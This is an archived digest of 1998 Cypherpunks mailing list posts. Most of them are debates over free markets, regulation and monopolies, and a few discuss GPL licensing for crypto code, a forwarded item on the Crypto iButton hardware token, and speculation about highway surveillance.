Subject: FW: I thought of an initialy regulated industry!... (fwd)
Message-ID: <D104150098E6D111B7830000F8D90AE8240683@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain




> -----Original Message-----
> From:	Blanc [SMTP:blancw@cnw.com]
> Sent:	Monday, October 05, 1998 12:10 AM
> To:	'Cypherpunks Distributed Remailer'
> Subject:	RE: I thought of an initialy regulated industry!... (fwd)
> 
 [...]
>  
> Free market economices don't "work", simply because they are run by
> humans, who regularly suffer
> psychological breakdowns, envy, and mistakes of judgement, not to mention
> disreputable marketing
> departments.   Regulated economies, however, are run by government drones,
> and are therefore perfect
> vehicles which, with unfailing success, make all of their captive
> customers happy.
> 
[four paragraphs of well written irony removed]


For those interested in a thoughtful (though slightly one sided) look at
this issue,
I strongly reccomend PJ O'Rourke's new book 'Eat the Rich'. He examines
several
locations (US, Sweden, Albania, Cuba, Russia, Hong Kong, Shanghai) in an
attempt to 
figure out why (economically) "some places suck and others don't" His bottom
line
is that the rule of law (especially contract law) is critical, as well as
democratic
government. 

He's much more interested in on-the-ground economic experience than in
government
figures, and is the only economics writer who can make me laugh out loud. He
does
have his blind spots - I would have liked to see what he makes of Singapore.

Peter Trei

[Excuse the lousy formatting - I'm using a Microsoft product]

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Mon, 5 Oct 1998 04:05:22 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Another question about free-markets...
In-Reply-To: <199810050453.XAA01444@einstein.ssz.com>
Message-ID: <19981005100325.A6527@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, Oct 04, 1998 at 11:53:28PM -0500, Jim Choate wrote:

> Now in a free-market, by definition, there is no law. What then is the

no in a free market there is no state

there are laws based on natural rights

-- 
pgp 1024/D9C69DF9 1997/10/14 steve mynott <steve@tightrope.demon.co.uk>

    the chief value of money lies in the fact that one lives in a world
in which it is overestimated.  -- h. l. mencken




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 6 Oct 1998 02:36:45 +0800
To: "James A. Donald" <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810042024.PAA32554@einstein.ssz.com>
Message-ID: <3.0.5.32.19981005101458.008ad910@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> It is certainly growing but the fact is that by a factor of
>> orders of magnitude commercial Unix'es own that market.
>> When it comes to mission critical servers Solaris, HP, &
>> AIX own the market still.
>
>The number one server is not Microsoft, and is not commercial.

Apache is the #1 server if you count by "web sites on the Internet".
Lots of web sites aren't on the Internet, but inside corporate nets,
which are more likely to be running commercial software, whether
commercial or NT, while people with home machines obviously prefer free.

But what if you count by "pages served per day"?  High-volume servers
are likely to run on bigger machines than low-volume servers,
so they're more likely to be running commercial Unix,
though some may be running on multi-Pentium systems with NT.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Mon, 5 Oct 1998 11:38:07 +0800
To: cypherpunks@cyberpass.net
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810051105.HAA13894@germs.dyn.ml.org>
Message-ID: <199810051636.LAA07155@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



Clear and coherent summary, and accurate.  Thanks.

At 11:39 AM 10/5/98 -0400, Perry E. Metzger wrote:
>
>My take on the licensing flame war:
>
>I live in both Richard Stallman's world (the Open Source community)
>and in the Cypherpunk crypto community.
>
>The two have different goals. RMS is mistaken about appropriate
>licensing for crypto code written by cypherpunks because he thinks the
>goals are the same, when they are not.
>
>The Open Source community seeks maximum spread of free software.
>The Cypherpunk community seeks maximum spread of the use of non-GAKed
>cryptography.
>
>Some members of the Cypherpunk community are happy to have source
>hoarders and such profit in any and all ways from the use of their
>code *IF* it will spread the use of cryptography in the world. They
>are willing to let anyone -- Microsoft, RMS, or anyone else -- use
>their work, even in ways that do not further the objectives of the
>Open Source community, provided it means more non-GAKed cryptography
>is in use by more people.
>
>The Open Source community obviously has different goals. It is seeking 
>free software, not the wide spread of cryptography.
>
>RMS is mistaking his goals for those of the cypherpunk
>community. Their goals are not diametrically opposed, but they are not 
>identical either, and so the sorts of licenses they may want to use
>for the software they create are not necessarily the same.
>
>EAY noted that he stopped distributing under GPL because *he*, the
>author, wanted more people to be stealing his code, thus spreading
>cryptography further. It wasn't a question of random people bitching
>that the GPL didn't let them write proprietary software -- it was THE
>AUTHOR OF THE CODE who wanted people to be able to write proprietary
>software, because he felt that the goal of spreading crypto was more
>important to him than the software freedom issue.
>
>I am in no way saying RMS should stop using the GPL, or attempting to
>say what sort of license is better for a particular author, but it
>should be recognised that there are people who are happy having their
>crypto routines stolen and incorporated into proprietary software --
>who are, in fact, elated when this happens, because it means more
>people will be using cryptographic software -- and that they might not
>find the GPL to be ideal for their goal.
>
>Perry
> 
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 5 Oct 1998 10:38:51 +0800
To: cypherpunks@cyberpass.net
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810051105.HAA13894@germs.dyn.ml.org>
Message-ID: <199810051539.LAA22048@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain




My take on the licensing flame war:

I live in both Richard Stallman's world (the Open Source community)
and in the Cypherpunk crypto community.

The two have different goals. RMS is mistaken about appropriate
licensing for crypto code written by cypherpunks because he thinks the
goals are the same, when they are not.

The Open Source community seeks maximum spread of free software.
The Cypherpunk community seeks maximum spread of the use of non-GAKed
cryptography.

Some members of the Cypherpunk community are happy to have source
hoarders and such profit in any and all ways from the use of their
code *IF* it will spread the use of cryptography in the world. They
are willing to let anyone -- Microsoft, RMS, or anyone else -- use
their work, even in ways that do not further the objectives of the
Open Source community, provided it means more non-GAKed cryptography
is in use by more people.

The Open Source community obviously has different goals. It is seeking 
free software, not the wide spread of cryptography.

RMS is mistaking his goals for those of the cypherpunk
community. Their goals are not diametrically opposed, but they are not 
identical either, and so the sorts of licenses they may want to use
for the software they create are not necessarily the same.

EAY noted that he stopped distributing under GPL because *he*, the
author, wanted more people to be stealing his code, thus spreading
cryptography further. It wasn't a question of random people bitching
that the GPL didn't let them write proprietary software -- it was THE
AUTHOR OF THE CODE who wanted people to be able to write proprietary
software, because he felt that the goal of spreading crypto was more
important to him than the software freedom issue.

I am in no way saying RMS should stop using the GPL, or attempting to
say what sort of license is better for a particular author, but it
should be recognised that there are people who are happy having their
crypto routines stolen and incorporated into proprietary software --
who are, in fact, elated when this happens, because it means more
people will be using cryptographic software -- and that they might not
find the GPL to be ideal for their goal.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 5 Oct 1998 13:53:35 +0800
To: "Brown, R Ken" <cypherpunks@einstein.ssz.com>
Subject: Re: Monitoring traffic
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F8487@MSX11002>
Message-ID: <v03130300b23ed11576b4@[209.66.100.23]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:41 AM -0800 10/5/98, Brown, R Ken wrote:
>This week's New Scientist magazine (p. 6) has a short column about Xacct
>t5hat looks as if the journalists swallowed a press release whole and
>have puked it up almost undigested:
>
>"Using the Internet could become more expensive if service providers
....


"When reached for comment, Crypto Anarchy Institute Director Timothy May
said: "This use of press releases in place of journalists actually
researching stories is of course common." He went on to add: "Get used to
it.""


--Tim May


Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hahn <mhahn@tcbtech.com>
Date: Mon, 5 Oct 1998 11:40:30 +0800
To: "Martinus Luther" <cypherpunks@cyberpass.net
Subject: Re: importance of  motivation
In-Reply-To: <19981005135608.2064.qmail@hotmail.com>
Message-ID: <3.0.1.32.19981005123632.009c5740@mail.aosi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 06:56 AM 10/5/98 PDT, Martinus Luther wrote:
>using your head to think any thoughts we don't want thank. Good Drugs 
>keep you addicted to your job, your country, your government, your boss. 
>The Best Drug is the mortgage.

If you want to condemn the whole damn system we call society, then the
"Best Drug" is to have children. See if that doesn't change your perspective
a bit.

-MpH
--------
Mark P. Hahn                    Work: 212-278-5861
mhahn@tcbtech.com               Home: 609-275-1834
TCB Technologies, Inc (mhahn@tcbtech.com)

Consultant to:
The SoGen Funds	1221 Avenue of the Americas, NY NY




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Mon, 5 Oct 1998 12:54:44 +0800
To: "'cypherpunks@einstein.ssz.com>
Subject: Monitoring traffic
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8487@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



This week's New Scientist magazine (p. 6) has a short column about Xacct
t5hat looks as if the journalists swallowed a press release whole and
have puked it up almost undigested:

"Using the Internet could become more expensive if service providers
adopt new software that allows separate billing for emails, downloading
graphics and streaming audio or video".  It desceibes an unlikley
scenario in which ISPs charge more per minute for high-quality video and
less for low-quality or email. I'm not sure the journalist knows the
difference between an ISP and a content provider. 

Yet another business that would be made obsolete by widespread use of
strong encryption.  Unless of course they mean to head that off at the
pass by making ISPs charge more to transfer encrypted packets?

When you look at their website http://www.xacct.com/usage.html you find
a description of what seems like a pretty normal system monitoring
application  (although I'm sure it is wonderfully written) surrounded by
what, when we were young and foolish, we used to call Marketdroid
Waffle:

"XACCTusage Family 

XACCTusage is a multi-source, multi-layer network usage metering and
mediation solution that gives
Network Service Providers (NSPs), including enterprise network
(Intranet) operators, the intelligence to
right-price IP services."

Enough to make your teeth curl.

The names of the people interviewed tickled my spoof detectors as well.
"Anil Uberoi" and "Charles Arsenault" sound distinctly dodgy on this
side of the Atlantic.

Ken Brown




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: me <me@myplace.to>
Date: Mon, 5 Oct 1998 11:43:24 +0800
To: "Blanc" <cypherpunks@einstein.ssz.com>
Subject: RE: I thought of an initialy regulated industry!... (fwd)
In-Reply-To: <000c01bdf045$4c5b3f60$7e8195cf@blanc>
Message-ID: <3.0.1.32.19981005124212.00a094c0@mail.ewol.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:48 AM 10/5/98 -0700, Blanc wrote:
>
>They never have to worry about who has more or less, who is better or
worse, or
>who knows better than anyone what is best for everyone.  It's all been
>pre-established and exists incontrovertibly in their national consumer
database.
>   ..
>Blanc

The above concept is embraced by a vast number of the planets population
and illustrates the ability of rationality to control perception.

----------------------------
"That's entertainment."  - Vlad the Impaler




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Mon, 5 Oct 1998 14:22:17 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810041334.IAA31037@einstein.ssz.com>
Message-ID: <v04011700b23eca2d7ada@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:34 AM -0500 10/4/98, Jim Choate wrote:
>> From: "James A. Donald" <jamesd@echeque.com>
>> Subject: RE: GPL & commercial software, the critical distinction (fwd)
>> Bullshit.  No monopoly has ever happened except by regulation
>That is truly Bullshit.

>Microsoft got to where it is because of a lack of regulation, the abuses of

	Microsoft is nowhere NEAR a monopoly. Yes, they are the largest in
their niche, but they are coming under increasing competition, and even
without government interference in the markets they will come under
increasing competition from Linux, Solaris x86, and possibly MacOS X.

>the aircraft industry  in the 1940-50's that led to regulation at the end of
>the 50's and 60's. The steel industry in the north east in the early 1900's.
>The food packing and garment industries of the north east and pacific coast
>in the 20's through the 50's. The railroad industry in the mid-1800's.

	The railroad industry in the mid-1800's was CAUSED BY GOVERNMENT.

	Try reading that link that Gering posted to Greenspans essay on
Anti-trust: http://www.ecosystems.net/mgering/antitrust.html

	I can't speak to the others, but I'd bet that lurking behind each
of them is the Government causing the problems it later seeks to solve with
more legislation.

>Every one of these created a monopolistic market because of a *lack* of
>regulation.

	Wrong. Too much government interference.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Mon, 5 Oct 1998 08:22:04 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com>
Subject: Re: Another question about free-markets... (fwd)
In-Reply-To: <199810051212.HAA02813@einstein.ssz.com>
Message-ID: <19981005141913.A13659@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, Oct 05, 1998 at 07:12:55AM -0500, Jim Choate wrote:
> 
> > From: Steve Mynott <stevem@tightrope.demon.co.uk>
> 
> > On Sun, Oct 04, 1998 at 11:53:28PM -0500, Jim Choate wrote:
> > 
> > > Now in a free-market, by definition, there is no law. What then is the
> > 
> > no in a free market there is no state
> > 
> > there are laws based on natural rights
> 
> Ok, who writes the laws? Who enforces the laws? Who decides what is natural?

whoever in a market by the division of labour finds it profitable will
write and enforce the laws

see David Friedman's

http://www.best.com/~ddfr/Libertarian/Machinery_of_Freedom/MofF_Chapter_29.html

for an explanation of how private courts and police could work

"Natural Law theory rests on the insight... that each entity has
distinct and specific properties, a distinct "nature", which can be
investigated by man's reason"  -- Murray N. Rothbard 

> Remember, we have *NO* participants in a free market other than the producer
> and the consumer. Two, and *only* two, parties are involved.

thats how economic thinking starts, or rather should start, and then
the economy is an array of these individual transactions..

police and courts provide a "middle man" function, so you would need
three participants

-- 
pgp 1024/D9C69DF9 1997/10/14 steve mynott <steve@tightrope.demon.co.uk>

    the first duty of a revolutionary is to get away with it.
        -- abbie hoffman




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raccoon <d96racon@dtek.chalmers.se>
Date: Mon, 5 Oct 1998 07:28:54 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <3.0.5.32.19981005190213.00845510@205.83.192.13>
Message-ID: <Pine.SOL.3.96.981005141606.19315B-100000@licia.dtek.chalmers.se>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 5 Oct 1998, Reeza! wrote:

> At 11:12 PM 10/4/98 +0200, Anonymous wrote:
> >At 12:59 PM 10/3/98 -0400, Michael Motyka wrote:
> >>> There is a desert which is 1000 miles across. There is a camel who can
> >carry
> >>> 1000 bananas maximum. The camel eats 1 banana per mile travelled. The
> camel
> >>> has a total of 3000 bananas to begin with. What is the maximum number of
> >>> bananas that the camel can get across to the other side uneaten?
> 
> Are we stipulating that the camel will travel in a straight line?
> Or will it meander a bit, following the path of least resistanct through
> the dunes?

Since we are looking for the best possible result (=the most bananans
moved to the other side), we must assume that the path of least resistance
equals a straight line. This may be improbable, but it is not impossible!
Remember that this is maths, and that we're looking for the best possible
limit.


// RACCOON

      /\/```\ /"""\  |    Web: http://www.dtek.chalmers.se/~d96racon
     ' ^\_/^ \  * ;  | e-mail: d96racon@dtek.chalmers.se 
     `(._ (.) \   \  | adress: Motg. 362 - 91
     <>  `.___/   /  |         412 80 GBG
     `---',--<       |
       `='      




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Mon, 5 Oct 1998 14:35:56 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810042024.PAA32554@einstein.ssz.com>
Message-ID: <v04011701b23ecd4a35e0@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:24 PM -0500 10/4/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Sun, 04 Oct 1998 12:42:58 -0700
>> From: "James A. Donald" <jamesd@echeque.com>
>> Subject: RE: GPL & commercial software, the critical distinction (fwd)
>
>> Microsoft is not a monopoly.  In servers, where much of their
>> income comes from,
>
>Malarky, MS makes the vast majority of their money off end-user and single
>machine licenses. Look at their quarterly or yearly earning statements.

	Ummm...Ever hear of this little start up in Cupertino called Apple?
Has a couple billion in the bank, net profits last quarter larger than Dell
&etc.

>> Linux is eating their lunch,
>
>It is certainly growing but the fact is that by a factor of orders of
>magnitude commercial Unix'es own that market. When it comes to mission
>critical servers Solaris, HP, & AIX own the market still.

	So M$ STILL doesn't have a monopoly.

>> and the
>> desktop is under continual threat.  For a monopoly to be a
>> monopoly, you not only have to have most of the market, you
>> have to have some means of excluding others, which Microsoft
>> manifestly does not.
>
>Not from a lack of trying on their part and the fact that federal regulators
>stepped in before it became totaly regulated.

	Crap, the Feds stepped in just as market forces were starting to
weaken Microsoft. Linux is starting to eat into the server market, Apple is
coming back out of it's slump, more and more people are starting to realize
home bad M$ is.


>> You are totally deluded.  None of these are examples of
>> monopoly,
>
>Certainly they were. Each and every example listed (and many more) were
>industries which were controlled by a small number of companies whose share
>in the total market was squeezing out competition. The results would have
>been a growing number of buyouts and thinning of competition to the point
>that only one or two companies would have survived.

	Other than the Railroads, which have already been shown to be a
government CREATED monopoly, how was the Aircraft Industry a monopoly? The
GARMENT INDUSTRY?

	Come on Jim, "Put Up Or Shut Up".

> except for the railroad industry where government
>> intervention was for the purpose of creating monopoly, not
>> preventing it.
>
>In the aircraft industry for example, while the number of riders was growing
>very quickly there was a concommitent increase in end-user ticket prices
>that was way out of line with the increased cost of business operations as
>well as a decrease in the overall safety of the industry which was
>exemplified by a increase in the number of air crashes and aircraft who
>couldn't pass maintenance inspections yet continued to fly.

	Doesn't sound like a monopoly issue as much as a saftey issue.
Nothing there looks like a conspiracy to prevent other from entering the
market.


>> The garment and food packing industries were and are a huge
>> network of innumerable tiny shops,
>
>All working for about 5 or 6 companies who actlualy marketed and distributed
>the items. Just get a Dallas Texas phone book for that period (it's a
>distribution hub for the clothing/garment industry even today).

	That is still 5 or 6 companies in competition.

>> and the aircraft industry
>> had several big companies in fierce competition.=20
>
>Yep, in the mid-50's there were like 5 national/international aircraft
>operators and the number of commercial avaition manufacturers selling to the
>national and international carrier market was like 3. There were smaller
>companies like Ryan for example but they were owned by the larger companies
>and eventualy merged into the regular operations.

	What barriers OTHER THAN REGULATORY/LEGAL did they raise to
competitors?
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Mon, 5 Oct 1998 07:31:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810051105.HAA13894@germs.dyn.ml.org>
Message-ID: <3618CA3C.D22851F9@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Rick Campbell wrote:

> I would vastly prefer that people simply place their code in the
> public domain explicitly.

I think it all depends upon the free will of the authors of the codes
to determine under exactly what conditions other people may share their
intellectual properties without paying money. The one may impose
some non-monetary conditions in the hope of achieving some
non-monetary effects in exchange of the work that has been done, while
the other impose no conditions at all. There can be no norm 
in that. After all, it is their codes and the potential users of
the codes may also have different views on that without unanimity.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 5 Oct 1998 14:05:21 +0800
To: cryptography@c2.net
Subject: Java-based Crypto Decoder Ring gets NIST FIPS 140-1 certification
Message-ID: <v04011743b23ec559dde1@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



As breathlessly reported in DIGSIG :-).

Cheers,
Bob Hettinga

--- begin forwarded text


MIME-Version: 1.0
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
Date:         Sat, 3 Oct 1998 09:45:19 -0500
Reply-To: Digital Signature discussion <DIGSIG@LISTSERV.TEMPLE.EDU>
Sender: Digital Signature discussion <DIGSIG@LISTSERV.TEMPLE.EDU>
From: Richard Hornbeck <rhornbec@COUNSEL.COM>
Subject:      Java-based Crypto Decoder Ring gets NIST FIPS 140-1 certification
To: DIGSIG@LISTSERV.TEMPLE.EDU

Java-based Crypto Decoder Ring gets NIST FIPS 140-1 certification

INSTEAD OF STORING YOUR PRIVATE KEY IN SOFTWARE ON YOUR PC, KEEP IT IN
HARDWARE, ON YOUR CLASS RING, KEY FOB, MONEY CLIP, WATCH OR ANYTHING ELSE
THAT CAN STORE A 16mm, stainless steel case. According to its Web site
(www.ibutton.com), "the iButtion provides for secure end-to-end Internet
transactions-including granting conditional access to Web pages, signing
documents, encrypting sensitive files, securing email and conducting
financial transactions safely - even if the client computer, software and
communication links are not trustworthy. When PC software and hardware are
hacked, information remains safe in the physically secure iButton chip."
Unlike storing your private key in software on your PC where it can remain
in cache after use, and be retrieved by a hacker, the crypto iButton private
key never enters your PC, so it cannot be intercepted.

In July, the Crypto iButton from Dallas Semiconductor received the NIST FIPS
140-1 "Security Requirements For Cryptographic Modules" certification. The
Crypto iButton provides hardware cryptographic services such as long-term
safe storage of private keys, a high-speed math accelerator for 1024-bit
public key cryptography, and secure message digest (hashing). To date, only
15 hardware products have been validated by the U.S. and Canadian
governments.

According to their press release at:
http://www.dalsemi.com/News_Center/Press_Releases/1998/pr_fips.html, the
Crypto iButton ensures both parties involved in a secure information
exchange are truly authorized to communicate by rendering messages into
unbreakable digital codes using its high-speed math accelerator. The Crypto
iButton addresses both components of secure communication, authentication
and safe transmission, making it ideal for Internet commerce and/or banking
transactions.

The Crypto iButton consists of a physically secure, million-transistor
microchip packaged in a 16mm stainless steel can. Not only does the steel
protect the silicon chip inside from the hard knocks of everyday use; it
also shows clear evidence of tampering by leaving scratch and dent marks of
the intruder. This steel case satisfies FIPS 140-1 Level 2 Tamper Evidence
requirements for physical security.

Note: Within the overall 140-1 certification are various sub-levels that
identify how well the product rates in different categories such as Physical
Security, Environmental Failure Protection, and Tamper Resistance. The sum
of the ratings in the individual categories determines whether it merits
certification.

The iButtion also allows the owner to set an automatic expiration date, to
limit the potential for unauthorized use. Once the built-in clock reaches a
pre-set time, the chip self-expires and requires re-activation by the
service provider before service can be renewed. The service provider can
verify that an individual has possession prior to initial activation or
renewal (re-activation). In this way, a lost or stolen iButton
unconditionally limits the potential for unauthorized use to the remaining
activation time, which can be made arbitrarily short by the iButton holder
or service provider.

According to its Web site, Blue Dot receptors using either the Java
operating system (OS), or a proprietary OS, can be purchased online for $15
each. The receptor plugs directly into the parallel port on a PC, and
includes software for configuring its features. The software also programs
the decoder ring with the private key the first time, and performs any other
administrative functions. Just press the Blue Dot with the iButton (ring,
fob, key ring, etc.) to establish the connection path.

If you know your ring size, you can order Josten's 'Java-powered ring,' or
the 'Digital Decoder Ring,' online. Also available are the 'Fossil Watch,
key ring, or money clip. http://www.iButton.com/DigStore/access.html#jring.
Costs for a single unit range from $45 to $89.

"Unlike a loose plastic card, the iButton stays attached to a carefully
guarded accessory, such as a badge, ring, key fob, watch band, or wallet,
making misplacement less likely. The steel button is rugged enough to
withstand harsh outdoor environments and durable enough for a person to wear
every day. An individual maintains control over their Crypto iButton in yet
another way-a secret Personal Identification Number. If so programmed, the
iButton will not perform computations until its PIN is entered, like a bank
ATM. "

A list of developers and their off-the-shelf applications is at:
http://www.iButton.com/Connections/Catalogs/index.html. Custom, networked,
server-based applications are available, in addition to individual,
standalone PC products. The crypto iButtion is currently being tested by the
USPS for electronic distribution of postage stamps.

The company marketed its iButton products for other non-crypto uses starting
in 1991. A list of current implemented and pilot projects using the product
to simply store and process data around the world is at:
http://www.iButton.com/showcase.html. This includes the mass-transit system
in Turkey, bus passes in China, vending machines in Canada, parking meters
in Brazil and Argentina, and buying gas in Mexico and Moscow.

Richard Hornbeck

www.primenet.com/~hornbeck

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Mon, 5 Oct 1998 14:59:37 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: I thought of an initialy regulated industry!... (fwd)
In-Reply-To: <199810042101.QAA00049@einstein.ssz.com>
Message-ID: <v04011704b23ed3c9bc28@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:01 PM -0500 10/4/98, Jim Choate wrote:
>Forwarded message:
>> Date: Sun, 04 Oct 1998 11:40:34 -0700
>> From: "James A. Donald" <jamesd@echeque.com>
>> Subject: Re: I thought of an initialy regulated industry!...
>cases of E. Coli for example would decrease? Why is it that the number of
>deaths in this country from salmonella and related food diseases have
>*decreased* since the industry was regulated in the early 1920's when the
>problem (people getting sick or dying from adulterated foodstuffs) was
>at its peak?

	Freon, or rather cheap refridgeration.


--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Mon, 5 Oct 1998 15:09:37 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another question about free-markets...
In-Reply-To: <199810050453.XAA01444@einstein.ssz.com>
Message-ID: <v04011705b23ed69864d5@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:53 PM -0500 10/4/98, Jim Choate wrote:
>Milton Friedman won the Nobel price in 1976 in economics. One of the
>questions he asked was:
>
>Do corporate executives, provided they stay within the law, have
>responsibilities in their business activities other than to make as much
>money for their stockholders as possible?
>
>His answer was 'no', they have no responsibility outside of those two
>considerations (ie the law, stockholders expectations of profit).

	The law was a very implicit assupmtion in his question.

	Take the law out of it and ask him again.

	If he gives you the same answer, he is wrong.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Briggs <ian@deepwell.com>
Date: Mon, 5 Oct 1998 17:09:59 +0800
To: cypherpunks@cyberpass.net
Subject: odd comment
Message-ID: <199810052206.PAA03010@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain



A friend of mine works in an IT department
for a major tech company.  Three of the people in
his department were just transfered to their new contract.

They are rewiring some of the network for a highway system
in California that monitors for explosives.

Now, he doesn't know anything more than that.
In California there are several highway stretches that have large
metal telephone poles stretching accross the two right lanes
of a major three lane highway.  On top of the poles are two 
metal boxes about the size large bread boxes.

Now any idea what those boxes are?
and if anyone has heard of this monitoring system and if so
what agency is responsible for this?

Also does anyone know who is responsible for all the cameras
that now monitor the highways?  Almost every overpass in Sacramento
has one that views each stretch of the highway.


-Ian






Welcome to 1984
as with all goverment projects, its a bit late 
and slightly overbudget
	-IB.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Mon, 5 Oct 1998 15:14:53 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another question about free-markets...
In-Reply-To: <199810050453.XAA01444@einstein.ssz.com>
Message-ID: <v04011706b23ed6f87b5a@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:58 AM -0500 10/5/98, James A. Donald wrote:
>At 11:53 PM 10/4/98 -0500, Jim Choate wrote:
>> Now in a free-market, by definition, there is no law. What
>> then is the responsibility of businesses other than the
>> pure unadulterated pursuit of profit?
>
>None whatsoever.

	One must also draw the distinction between long term profits, and
this quarters bottom line.

	Things that positively impact this weeks bottom line (say, dumping
PCB's in the local water supply) negatively impact next year/next decades
(all your prospective customers are either dead, or have 3.5 arms, and a
distinct lisp).

>> If this includes lying, denying consumers information, etc.
>> what harm is done, they have fulfilled their responsibility
>> to their shareholders (potentialy quite lucratively)
>
>While there is a sucker born every minute, the strategy you
>describe is for the most part unlikely to be profitable.

	In the _long_ term.

>Fortunately the most cost effective method of eliminating all
>competition is that followed by Alcoa, to deliver a
>satisfactory product at the cheapest possible price.

	Funny how he never talks about that one.



--
petro@playboy.com----for work related issues. I don't speak for Playboy.
